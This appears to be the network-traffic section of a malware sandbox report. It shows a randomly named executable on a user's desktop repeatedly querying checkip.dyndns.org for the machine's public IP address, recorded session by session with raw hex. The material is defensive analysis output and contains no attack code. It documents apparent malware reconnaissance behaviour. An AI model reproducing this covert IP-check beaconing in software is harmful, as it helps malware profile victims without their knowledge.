Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.3	49991	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:49.921541929 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:31:50.607156038 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.3	49993	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:51.616767883 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:31:52.294369936 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.3	49995	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:53.250804901 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:31:53.936929941 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:53 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.3	49997	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:54.991949081 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:31:55.731010914 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.3	49999	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:56.658602953 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:31:57.339839935 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.3	50001	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:31:58.511364937 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:31:59.215167046 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.3	50003	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:00.221029043 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:00.918642044 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.3	50005	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:02.075225115 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:02.769104004 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.3	50007	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:03.705920935 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:04.397186995 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.3	50009	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:05.339329958 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:06.012968063 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.3	50011	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:06.854518890 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:07.542799950 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.3	50013	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:08.532440901 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:09.204433918 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.3	50015	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:10.218214035 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:10.861000061 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.3	50017	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:11.713679075 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:12.395607948 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.3	50019	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:13.315646887 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:14.010092974 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.3	50021	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:14.931798935 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:15.622426987 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.3	50023	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:16.569268942 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:17.241962910 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.3	50025	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:18.221340895 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:18.901566982 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.3	50027	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:20.157989025 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:20.920300961 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.3	50029	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:21.908871889 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:22.613194942 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.3	50031	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:23.561160088 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:24.274621964 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.3	50033	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:25.167644024 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:25.873476982 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.3	50035	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:26.832545996 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:27.508225918 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.3	50037	132.226.247.73	80	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:28.453649998 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
